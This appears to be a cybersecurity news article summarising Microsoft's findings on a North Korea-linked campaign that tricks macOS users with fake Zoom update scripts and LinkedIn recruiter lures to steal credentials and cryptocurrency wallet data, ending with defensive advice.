A new and highly sophisticated cyber campaign linked to North Korea-backed threat actors has been uncovered, targeting macOS users and stealing cryptocurrency holdings, login credentials, and other sensitive personal data. According to Microsoft’s threat intelligence team, the operation relies less on advanced technical exploits and more on social engineering tactics that manipulate users into unknowingly triggering the attack themselves.
The campaign reportedly begins with a fake Zoom meeting invite or software update prompt, where victims are asked to download a file named “Zoom SDK Update.scpt.” Although it appears harmless, the file is actually a compiled AppleScript that opens in macOS Script Editor and is designed to resemble a legitimate software update interface.
Security researchers note that the script contains thousands of deliberately inserted blank lines, pushing the malicious code out of immediate view. This technique is intended to reduce the chances of detection by users reviewing the script. Once executed, the script uses legitimate macOS system utilities to simulate a genuine update process, while malicious code runs silently in the background.
FCRF Returns With CDPO, Its Premier Data Protection Certification for Privacy Professionals
Sapphire Sleet: Lazarus Group Connection
Microsoft has attributed the campaign to a threat cluster tracked as “Sapphire Sleet,” associated with the Lazarus Group and linked to APT38 operations. The group has a long history of targeting financial institutions, cryptocurrency platforms, and technology professionals worldwide.
The attack unfolds in multiple stages. In the initial phase, the script executes trusted macOS tools such as “softwareupdate,” creating the illusion of normal system activity. It then uses “curl” commands to fetch additional payloads from external servers, enabling a multi-stage infection chain that progressively expands control over the compromised system.
Multi-Stage Payloads Steal Sensitive Data
These payloads serve different purposes, including establishing backdoors, collecting system data, and connecting to command-and-control infrastructure. During this process, attackers attempt to bypass macOS security protections and extract sensitive information such as passwords, browser history, Apple Keychain data, Telegram credentials, and cryptocurrency wallet details.
A further concern is the use of Apple-like naming conventions such as “systemupdate.app” and “com.apple.cli,” designed to mimic legitimate system processes. This deception increases user trust and can even prompt victims to enter system passwords, which are then directly harvested by the attackers.
LinkedIn Lures and Expert Warnings
Microsoft’s threat intelligence team emphasized that social engineering has become one of the most dangerous tools in modern cyber warfare. According to the team, attackers exploit users’ familiarity with routine digital interactions such as remote support requests, meeting links, and software updates.
Cybersecurity expert and former IPS officer Professor Triveni Singh stated that such attacks rely more on human psychology than technical vulnerabilities. He noted that attackers increasingly focus on exploiting trust, routine behavior, and cognitive shortcuts rather than breaking through system defenses directly.
The report also highlights that the campaign often begins on professional networking platforms such as LinkedIn, where fake recruiter profiles are used to initiate contact. Victims are typically approached with fake job opportunities or technical interview requests, followed by malicious file transfers or meeting links.
Experts warn that such attacks are more dangerous than traditional malware because they combine technical deception with psychological manipulation. Once a victim executes the file, the system can effectively fall under attacker control without triggering obvious security alerts.
Microsoft has shared its findings with Apple, prompting updates to Safari and XProtect security mechanisms aimed at blocking known malicious infrastructure and associated file patterns.
Security experts strongly advise users to avoid executing any unknown scripts, links, or attachments without verification from IT or cybersecurity teams, especially those received via email or messaging platforms.
The campaign is currently considered active, with ongoing efforts by cybersecurity agencies to identify associated infrastructure, command servers, and potential victims across multiple regions.
